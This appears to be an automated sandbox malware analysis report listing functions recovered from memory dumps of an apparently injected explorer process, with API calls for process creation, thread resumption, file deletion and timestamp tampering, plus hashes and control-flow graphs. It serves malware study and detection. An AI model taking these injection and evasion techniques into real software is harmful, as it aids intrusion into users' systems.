                                                      • Source File: 0000000C.00000002.629839810.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Offset: 02801000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2801000_explorer.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateSection
                                                      • String ID: @$@
                                                      • API String ID: 2449625523-149943524
                                                      • Opcode ID: 7986f009ac0f096a0d93092820368ebc118aed73d931aaf233c3ded0dfe06134
                                                      • Instruction ID: 8b948b220472170e68bca73ce4155a58b834241b854067064d45a3cf5a2c5785
                                                      • Opcode Fuzzy Hash: 7986f009ac0f096a0d93092820368ebc118aed73d931aaf233c3ded0dfe06134
                                                      • Instruction Fuzzy Hash: E7316FB8908B898FCB94DF58D8C566AB7E0FB5C306F10066EE95DE3291DB30D840CB85
                                                      Function 02805174 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103encryptionCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 358 2805174-28051b3 CryptAcquireContextA 359 2805256-280526a 358->359 360 28051b9-280521b 358->360 365 280521e-280523e 360->365 367 2805240-280524e 365->367 367->359
                                                      APIs
                                                      • CryptAcquireContextA.ADVAPI32 ref: 028051A9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.629839810.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Offset: 02801000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2801000_explorer.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AcquireContextCrypt
                                                      • String ID: %02X
                                                      • API String ID: 3951991833-436463671
                                                      • Opcode ID: 9ba93dbf62791bb373f1cafe5aeeec9cbd4ebde5fda2e8a6a364b32c22fd26f9
                                                      • Instruction ID: 14f226123f28a14ad28bdfd1bf997f779445fc99663e68253b51fdea7f756ed0
                                                      • Opcode Fuzzy Hash: 9ba93dbf62791bb373f1cafe5aeeec9cbd4ebde5fda2e8a6a364b32c22fd26f9
                                                      • Instruction Fuzzy Hash: C6317C30618A0D8FCF58EF68D8886EE7BA1FB98305F010279EC4EE7245DF3495419B95
                                                      Function 028035E8 Relevance: 1.9, APIs: 1, Instructions: 412comCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.629839810.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Offset: 02801000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2801000_explorer.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateInstance
                                                      • String ID:
                                                      • API String ID: 542301482-0
                                                      • Opcode ID: 74d1e6b67242ff682a275413a25c7c62c6eb1582b11612f6c2361affd49a2485
                                                      • Instruction ID: 80ee6b75805d9d779247e48ada8d5ee2d01e2c5444a72ca87d658c750a3ddd7a
                                                      • Opcode Fuzzy Hash: 74d1e6b67242ff682a275413a25c7c62c6eb1582b11612f6c2361affd49a2485
                                                      • Instruction Fuzzy Hash: 51E1EB34608A4C8FCB94EF28C895F99B7F1FFA9305F114699E44ACB265DB70E944CB42
                                                      Function 02803490 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetUserNameW.ADVAPI32 ref: 028034E4
                                                        • Part of subcall function 028035E8: CoCreateInstance.OLE32 ref: 02803635
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.629839810.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Offset: 02801000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2801000_explorer.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateInstanceNameUser
                                                      • String ID:
                                                      • API String ID: 3213660374-0
                                                      • Opcode ID: 66936f5a13a6f90c6230e28eb3fdd20d3e72d878b8e61cb291cfd48d82a15998
                                                      • Instruction ID: 3c0d0b2fd842bd6a2d4cc0fa318b1bfd1f101af48d04ab706a8324f409dde88d
                                                      • Opcode Fuzzy Hash: 66936f5a13a6f90c6230e28eb3fdd20d3e72d878b8e61cb291cfd48d82a15998
                                                      • Instruction Fuzzy Hash: CB11DA38718B4C4FCBD4EF6C945875EB6D2FBDC310F904A6E984DC3295DA7889458B82
                                                      Function 028019D0 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 299threadmemorylibraryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.629839810.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Offset: 02801000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2801000_explorer.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Create$CloseHandleThread$HeapLibraryLoad
                                                      • String ID: %g?$iP+
                                                      • API String ID: 1420940861-765743493
                                                      • Opcode ID: beecc41ad1b9c7ac7640971538dc6f5c7c206b3b77287f35aeb0f1d381c9eb00
                                                      • Instruction ID: b10ee02a45f19e0e5f8070d87a7ef027a2088157d4df5a107fb80439743ad1b3
                                                      • Opcode Fuzzy Hash: beecc41ad1b9c7ac7640971538dc6f5c7c206b3b77287f35aeb0f1d381c9eb00
                                                      • Instruction Fuzzy Hash: 3C910638618A088FDF94EF18CCC56A573D6FB98310B48017E9C4ECB196DB34E952DB92
                                                      Function 02801F04 Relevance: 7.7, APIs: 5, Instructions: 172fileCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • DeleteFileW.KERNEL32 ref: 02801F8E
                                                      • CopyFileW.KERNEL32 ref: 02801F9D
                                                      • DeleteFileW.KERNEL32 ref: 02801FAE
                                                      • DeleteFileW.KERNEL32 ref: 02801FF9
                                                        • Part of subcall function 02804920: SetFileAttributesW.KERNEL32 ref: 0280496F
                                                        • Part of subcall function 02804920: CreateFileW.KERNEL32 ref: 02804999
                                                        • Part of subcall function 02804920: SetFileTime.KERNEL32 ref: 028049C4
                                                      • CreateFileW.KERNEL32 ref: 02802085
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.629839810.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Offset: 02801000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2801000_explorer.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$Delete$Create$AttributesCopyTime
                                                      • String ID:
                                                      • API String ID: 642576546-0
                                                      • Opcode ID: 450f160cc9ca50c00f92dd82e014c961736e81def095327de2f357bf280c45cc
                                                      • Instruction ID: f76cee0920b55580d3c4e168a80583eef73ded69a24d376765d71a77410aa6f9
                                                      • Opcode Fuzzy Hash: 450f160cc9ca50c00f92dd82e014c961736e81def095327de2f357bf280c45cc
                                                      • Instruction Fuzzy Hash: EF414028718A4C4FCBD8AF6C589876D75D2EB9C311F50457EA80EC32C5DE789D068B92
                                                      Function 0280230C Relevance: 7.5, APIs: 3, Strings: 1, Instructions: 505fileCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 156 280230c-2802369 call 2803de0 159 2802817 156->159 160 280236f-2802374 156->160 162 280281d-2802837 159->162 160->159 161 280237a-280237d 160->161 161->159 163 2802383-280238e 161->163 164 2802394-28023c7 call 2804fc8 163->164 165 2802807-280280d call 2805348 163->165 164->165 171 28023cd-28023f2 call 2804f1c call 28050dc 164->171 169 2802812-2802815 165->169 169->159 169->162 176 28023f4-280240e 171->176 177 280241d 171->177 176->177 181 2802410-280241b 176->181 178 2802422-280243b call 28050dc 177->178 183 2802441-2802454 178->183 184 28025aa-28025b2 178->184 181->178 187 28024a6-28024a8 183->187 188 2802456-280249d 183->188 185 28025b8-28025bc 184->185 186 280279d-28027ca call 2803de0 184->186 191 28025c2-28025ca 185->191 192 2802664-28026f4 call 28046a0 call 2803444 call 2803de0 call 2805348 185->192 199 28027cc-28027d3 186->199 200 28027ff-2802805 186->200 187->184 190 28024ae-2802520 call 2805368 DeleteFileW CreateFileW 187->190 188->187 216 2802522-2802579 call 2804f1c call 2804fc8 WriteFile 190->216 217 280259f-28025a5 call 2805348 190->217 195 28025d0-28025dd 191->195 196 28026f9-2802726 call 2803de0 191->196 192->165 195->200 211 28025e3-28025e6 195->211 196->200 208 280272c-2802733 196->208 199->200 204 28027d5-28027d8 199->204 200->165 204->200 209 28027da-28027fa call 2802840 call 2805348 204->209 208->200 213 2802739-280273c 208->213 209->200 211->200 218 28025ec-28025f0 211->218 213->200 220 2802742-280279b call 2802840 call 28046a0 call 2805348 213->220 250 2802582-280259a call 2804920 call 28052cc 216->250 217->184 224 28025f2-280261f call 2803de0 218->224 225 2802657-280265e 218->225 220->200 234 2802651-2802655 224->234 235 2802621-2802628 224->235 225->192 225->200 234->224 234->225 235->234 239 280262a-280262d 235->239 239->234 243 280262f-280264c call 2802840 call 2805348 239->243 243->234 250->217
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.629839810.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Offset: 02801000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2801000_explorer.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$CreateDeleteWrite
                                                      • String ID: |:|
                                                      • API String ID: 2199199414-3736120136
                                                      • Opcode ID: 61796c1032acc2d464252e370c1eb990376f9906240aefb40997e5410d444d41
                                                      • Instruction ID: 2c7561992c36e0bba78d296a3cd920a12583e149bfe622b5c84c68ef455dc391
                                                      • Opcode Fuzzy Hash: 61796c1032acc2d464252e370c1eb990376f9906240aefb40997e5410d444d41
                                                      • Instruction Fuzzy Hash: C0E1AA34718F484FD7A9AB6C88987AA76D1FB98311F10462ED89FC32C5DF74E9018B46
                                                      Function 02804E00 Relevance: 6.1, APIs: 4, Instructions: 122registryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.629839810.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Offset: 02801000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2801000_explorer.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AgentCloseObtainOpenQueryStringUserValue
                                                      • String ID:
                                                      • API String ID: 2776781324-0
                                                      • Opcode ID: 24d59a88fc2a56af890fc7d913f5bd0d823e899b5ad6f282e20803fe12498a88
                                                      • Instruction ID: 3ad70815657a9b38439f47949a6d47874275e2c1b37f1bd0fcbf1cc72b18d522
                                                      • Opcode Fuzzy Hash: 24d59a88fc2a56af890fc7d913f5bd0d823e899b5ad6f282e20803fe12498a88
                                                      • Instruction Fuzzy Hash: 1331A835608A4C8FDB58EF6CDC896EA77D6FB98310B00027ADD5EC3585EF7498068B91
                                                      Function 02801D8C Relevance: 4.6, APIs: 3, Instructions: 121synchronizationCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 02804C90: GetVolumeInformationA.KERNEL32 ref: 02804CFD
                                                      • CreateMutexExA.KERNEL32 ref: 02801DFF
                                                      • CreateFileMappingA.KERNEL32 ref: 02801EB1
                                                      • SleepEx.KERNEL32 ref: 02801EEE
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.629839810.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Offset: 02801000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2801000_explorer.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Create$FileInformationMappingMutexSleepVolume
                                                      • String ID:
                                                      • API String ID: 3744091137-0
                                                      • Opcode ID: b295d91b1288181eeec1ab488aa5c8e8f68c45d7ddea544eda9a6e783b4b8990
                                                      • Instruction ID: 2a2f1f48cf0963bfb1c46b42febfffec9d869a6feae233277bfd22060d4a076b
                                                      • Opcode Fuzzy Hash: b295d91b1288181eeec1ab488aa5c8e8f68c45d7ddea544eda9a6e783b4b8990
                                                      • Instruction Fuzzy Hash: DC418638714F088FEBA4EB78849C7AF76D2EF98716F504A2E805FD6180CF7495029B42
                                                      Function 02804920 Relevance: 4.6, APIs: 3, Instructions: 84filetimeCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.629839810.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Offset: 02801000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2801000_explorer.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$AttributesCreateTime
                                                      • String ID:
                                                      • API String ID: 1986686026-0
                                                      • Opcode ID: 930f7abb6ba3d294a324d478d7cbd4b4fadb59d1e54ccc78cf6df5b131a4bb52
                                                      • Instruction ID: 95d17b88d091464d295adeb53da372b69cc724d3205cf8352d8ea0b0fba8d750
                                                      • Opcode Fuzzy Hash: 930f7abb6ba3d294a324d478d7cbd4b4fadb59d1e54ccc78cf6df5b131a4bb52
                                                      • Instruction Fuzzy Hash: 4521363070CB484FDF64EF58988875E76E2FBDC701F10456DA84EC7245DA34DA058782
                                                      Function 02804A40 Relevance: 4.6, APIs: 3, Instructions: 84COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.629839810.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Offset: 02801000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2801000_explorer.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InformationToken$CloseHandle
                                                      • String ID:
                                                      • API String ID: 3193473064-0
                                                      • Opcode ID: c45b8c63f5540566594fff1aa2102bed85fce811da33fa4b3c4f4cd4104ad40d
                                                      • Instruction ID: d8f9bc2e4f69188bb20dc324b55574dfc4509fc35ee3c816286350af672bd11f
                                                      • Opcode Fuzzy Hash: c45b8c63f5540566594fff1aa2102bed85fce811da33fa4b3c4f4cd4104ad40d
                                                      • Instruction Fuzzy Hash: 4B215334208B088FC754EB2CD49866AB7E2FF99311B050A6EE49AC7254CB74DC05DB42
                                                      Function 02803F7C Relevance: 3.5, APIs: 2, Instructions: 455COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 369 2803f7c-2803fbd 370 2803fc6-280400c call 2805328 call 2805274 call 2804434 369->370 371 2803fbf-2803fc1 369->371 379 280401a-2804020 370->379 380 280400e-2804018 370->380 372 280439c-28043b7 371->372 381 2804022-2804030 379->381 380->381 383 2804036-280406d 381->383 384 280438e-280439a call 28052cc 381->384 389 2804383-2804384 383->389 390 2804073-280409e 383->390 384->372 389->384 390->389 392 28040a4-28040b9 390->392 393 28040bb-28040bd 392->393 394 280410f-2804114 392->394 395 2804117-2804150 393->395 396 28040bf-28040db call 2804f1c 393->396 394->395 402 2804350-280435d 395->402 403 2804156-280415c 395->403 400 28040f9-280410d call 2804f1c 396->400 401 28040dd-28040f4 call 2804fc8 396->401 400->395 401->400 414 280436a-280436d 402->414 415 280435f-2804365 call 28052cc 402->415 406 280417e-2804188 403->406 407 280415e-280417b 403->407 408 2804233-2804259 406->408 409 280418e-2804199 406->409 407->406 424 2804332-2804343 408->424 425 280425f-2804270 408->425 412 28041a0-280422b call 2804f1c call 2805328 call 2805384 call 2804f1c call 28043c0 call 28052cc * 3 409->412 413 280419b 409->413 412->408 413->412 419 280437a-2804380 414->419 420 280436f-2804375 call 28052cc 414->420 415->414 419->389 420->419 424->402 432 2804345-280434b call 28052cc 424->432 425->424 431 2804276-28042a1 RtlAllocateHeap 425->431 434 28042a3-28042ad 431->434 432->402 437 28042cd-28042eb 434->437 438 28042af-28042cb RtlReAllocateHeap 434->438 442 28042ed 437->442 443 28042ef-28042f4 437->443 438->437 442->443 443->434 445 28042f6-2804301 443->445 446 2804322-280432a 445->446 447 2804303-2804309 call 2805368 445->447 446->424 452 280430e-2804318 447->452 452->446
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.629839810.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Offset: 02801000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2801000_explorer.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 645ee96dd51e5548f5f84f988a5f238b2320184fe60a1c61053787b84221b83b
                                                      • Instruction ID: e831c251376a9d669a9f23a0b00386dcfa580c2198304f12806232654113a404
                                                      • Opcode Fuzzy Hash: 645ee96dd51e5548f5f84f988a5f238b2320184fe60a1c61053787b84221b83b
                                                      • Instruction Fuzzy Hash: 8CD17238758B098FDB94EF6CD88566EB7E2FB98701F50452DE54AD3281DB74D8028B82
                                                      Function 02802CD0 Relevance: 3.3, APIs: 2, Instructions: 254threadCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 457 2802cd0-2802cfe call 28032ec 460 2802f92-2802fa2 457->460 461 2802d04-2802d0f 457->461 461->460 462 2802d15-2802d17 461->462 463 2802f7d-2802f8d call 28052cc 462->463 464 2802d1d-2802d26 462->464 463->460 464->463 466 2802d2c-2802d33 464->466 466->463 467 2802d39-2802d6f call 2804d8c 466->467 467->463 472 2802d75-2802d94 call 2804518 467->472 475 2802f67-2802f78 call 28052cc * 2 472->475 476 2802d9a-2802d9b 472->476 475->463 477 2802d9d-2802dbf 476->477 482 2802f55-2802f60 477->482 483 2802dc5-2802de0 call 2804fc8 477->483 482->475 483->482 486 2802de6-2802dea 483->486 486->482 487 2802df0-2802e02 486->487 488 2802e04-2802e06 487->488 489 2802e0c-2802e31 call 2804578 487->489 488->489 491 2802f34-2802f4f SleepEx 488->491 493 2802e37-2802ee9 call 2805328 call 2802fac 489->493 494 2802f29-2802f2f call 28052cc 489->494 491->477 491->482 505 2802efa-2802f0a ResumeThread call 28052cc 493->505 506 2802eeb-2802ef3 493->506 494->491 508 2802f0f-2802f22 505->508 506->505 508->494
                                                      APIs
                                                        • Part of subcall function 028032EC: CreateFileW.KERNEL32 ref: 02803332
                                                        • Part of subcall function 028032EC: ReadFile.KERNEL32 ref: 02803379
                                                      • ResumeThread.KERNEL32 ref: 02802EFE
                                                      • SleepEx.KERNEL32 ref: 02802F43
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.629839810.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Offset: 02801000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2801000_explorer.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$CreateReadResumeSleepThread
                                                      • String ID:
                                                      • API String ID: 3143597149-0
                                                      • Opcode ID: 365ea5b30f4c01e7835fe031ab68ac010f306e42860d01eb5cafeb498fe40cd3
                                                      • Instruction ID: cb5ea7ee88fcaadd628bdc8b3c2a0676ccaa59bcc1da444653c0be176c423282
                                                      • Opcode Fuzzy Hash: 365ea5b30f4c01e7835fe031ab68ac010f306e42860d01eb5cafeb498fe40cd3
                                                      • Instruction Fuzzy Hash: FD719A34308F499FD768EB28C8987AAB7D2FF98311F54452DD45EC3285DF74A8428B82
                                                      Function 028032EC Relevance: 3.2, APIs: 2, Instructions: 157fileCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 511 28032ec-280333f CreateFileW 512 2803341-2803351 511->512 513 28033b5-28033b8 511->513 520 2803353-2803387 call 2805328 ReadFile 512->520 521 28033ac-28033ad 512->521 514 2803420-2803421 513->514 515 28033ba-28033bd 513->515 516 2803423-280343c 514->516 515->514 517 28033bf-28033e1 call 2805328 call 2804f1c 515->517 528 28033e3-2803406 517->528 527 280338f-28033a3 call 2804fc8 520->527 521->513 527->521 533 28033a5-28033a6 527->533 532 2803408-280341e call 28052cc * 2 528->532 532->516 533->521
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.629839810.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Offset: 02801000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2801000_explorer.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$CreateRead
                                                      • String ID:
                                                      • API String ID: 3388366904-0
                                                      • Opcode ID: 860b54b27e55d88d468d3aef3d1eb136f62499f2293734d64539839b6a1dbfdb
                                                      • Instruction ID: c79ed3cf0cade407fdfd86877ccfe32798a986688a11d3fedaa10a1780b5a8c5
                                                      • Opcode Fuzzy Hash: 860b54b27e55d88d468d3aef3d1eb136f62499f2293734d64539839b6a1dbfdb
                                                      • Instruction Fuzzy Hash: 5B41C53871CF0D4FD798AA6C589937AB6C2FBC9311F54426E959FC3281DE24980247C2
                                                      Function 02803CD0 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 538 2803cd0-2803ce0 539 2803ce2-2803d04 EnumWindows SleepEx 538->539 540 2803d06-2803d14 538->540 539->539 539->540
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.629839810.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Offset: 02801000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2801000_explorer.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: EnumSleepWindows
                                                      • String ID:
                                                      • API String ID: 498413330-0
                                                      • Opcode ID: bcd33d68b26800d53c1a0055312e6970b5242bc1254dfeb745dd1bbf27494588
                                                      • Instruction ID: 1463d5e46deb1595a3555ad154bed2e852597fb94a3d4e72d5661fa7ae90eeb7
                                                      • Opcode Fuzzy Hash: bcd33d68b26800d53c1a0055312e6970b5242bc1254dfeb745dd1bbf27494588
                                                      • Instruction Fuzzy Hash: 34E04F345046098FFB68ABA4C4D8BB036A1EB18206F1401BADC0EDD285CB768995C720
                                                      Function 02804578 Relevance: 1.6, APIs: 1, Instructions: 119processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateProcessInternalW.KERNEL32 ref: 0280465C
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.629839810.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Offset: 02801000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2801000_explorer.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateInternalProcess
                                                      • String ID:
                                                      • API String ID: 2186235152-0
                                                      • Opcode ID: af81d194f5fd3f12c6410c72f9c850e3bdf48fe1056d627e372d0d81f6bf526e
                                                      • Instruction ID: 44defb51d7f270c750abc859981a7be7908ba0bc13b15a02e5eef8d3f5e43656
                                                      • Opcode Fuzzy Hash: af81d194f5fd3f12c6410c72f9c850e3bdf48fe1056d627e372d0d81f6bf526e
                                                      • Instruction Fuzzy Hash: 4C316D34708F484FCB94EF6C948875AB6E2FB9C311F504A6E944ED3295DB78D8458B82
                                                      Function 02804C90 Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetVolumeInformationA.KERNEL32 ref: 02804CFD
                                                        • Part of subcall function 02805174: CryptAcquireContextA.ADVAPI32 ref: 028051A9
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.629839810.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Offset: 02801000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2801000_explorer.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AcquireContextCryptInformationVolume
                                                      • String ID:
                                                      • API String ID: 4059528372-0
                                                      • Opcode ID: 570b72cb9fefb269fa565bf88e84819b9281ae41eeb4bd408b08a14378af43d4
                                                      • Instruction ID: 5ff07bd752fa8db797625aba05fd4c3e9b54ddc78cee21879b665b228ec3de38
                                                      • Opcode Fuzzy Hash: 570b72cb9fefb269fa565bf88e84819b9281ae41eeb4bd408b08a14378af43d4
                                                      • Instruction Fuzzy Hash: 2D318E34618B4C8FD794EF2CC84879977E2FB98311F50062E984ED7264DE34D9458B82
                                                      Function 02801980 Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 028019D0: RtlCreateHeap.NTDLL ref: 02801AE7
                                                      • SleepEx.KERNEL32(?,?,?,?,?,?,?,02801973), ref: 028019A0
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.629839810.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Offset: 02801000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2801000_explorer.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateHeapSleep
                                                      • String ID:
                                                      • API String ID: 221814145-0
                                                      • Opcode ID: 9adc8d4cde1f516ddaa5c4750073014e5650bc8f10d33b0d75f43d3a0b67238f
                                                      • Instruction ID: 34d133c5690be3e00550cd96fe64d10bedd82614cf9b53e792362d9b8a5fd0e1
                                                      • Opcode Fuzzy Hash: 9adc8d4cde1f516ddaa5c4750073014e5650bc8f10d33b0d75f43d3a0b67238f
                                                      • Instruction Fuzzy Hash: BFE0481CB14A084BDBD4B77D9CCC33C61A1DBC8365F941579691DC61C5D924C8408723

                                                      Executed Functions

                                                      Function 003908B0 Relevance: 1.3, Strings: 1, Instructions: 77COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.419686380.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_390000_gwseuha.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: tPp
                                                      • API String ID: 0-1477601333
                                                      • Opcode ID: 3944d7dc5a17a6eda8477535b051b589c72a69c3be36b9d0cad756d7991e27b2
                                                      • Instruction ID: 984a511bd6c1b92eedd379f0cb460840ebb14cddba1a92eb663062b0a70304be
                                                      • Opcode Fuzzy Hash: 3944d7dc5a17a6eda8477535b051b589c72a69c3be36b9d0cad756d7991e27b2
                                                      • Instruction Fuzzy Hash: EC210C353006118FC749EB38C458A2D77F6AF8A61532605A9E546CF372DF76DC42CB91
                                                      Function 00391539 Relevance: 1.3, Strings: 1, Instructions: 58COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.419686380.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_390000_gwseuha.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 8p
                                                      • API String ID: 0-2220451280
                                                      • Opcode ID: 032cb9975b8c38365436980e707c95e20df0feb425b0ad43c6c243ff31604d4f
                                                      • Instruction ID: 97fbfc2c6fc37da3919b67f1be8fc0a0df2ff60c0ded757b2ccd919d026c4071
                                                      • Opcode Fuzzy Hash: 032cb9975b8c38365436980e707c95e20df0feb425b0ad43c6c243ff31604d4f
                                                      • Instruction Fuzzy Hash: 49114E316103049FD347B778E8507A53BB9EB4B721F4680AAD415CB367DB64DC018BA1
                                                      Function 00390E30 Relevance: .4, Instructions: 440COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.419686380.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_390000_gwseuha.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 40c1e6799d128e6716e2aeca5f60e314bb681617e43ede9bc9d8d9b0c8b7d5e6
                                                      • Instruction ID: 2f0cd4053205eebb5e0bb32a0e2f4b027c64e4fc9ce59ec4ef89cd998bf5e483
                                                      • Opcode Fuzzy Hash: 40c1e6799d128e6716e2aeca5f60e314bb681617e43ede9bc9d8d9b0c8b7d5e6
                                                      • Instruction Fuzzy Hash: 2202C2306007569FCB15DF68C880AAEBBF2FF88300B15C968D955AB395DB71ED46CB90
                                                      Function 003909B0 Relevance: .3, Instructions: 312COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.419686380.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_390000_gwseuha.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dc0530bfac1eae9eae19c82797f216b06a3de9eb3932a2912467f990fd396d9f
                                                      • Instruction ID: d52bd0d7dbc9aeffa460a0f123923d06f4abccdd69d8e078be6f1e6a1c41bb6a
                                                      • Opcode Fuzzy Hash: dc0530bfac1eae9eae19c82797f216b06a3de9eb3932a2912467f990fd396d9f
                                                      • Instruction Fuzzy Hash: 42D14C34214302CFDB0EDF24D944B697BB6BF89300F658868E8568B765DB79ED41CB90
                                                      Function 00390E21 Relevance: .2, Instructions: 194COMMON
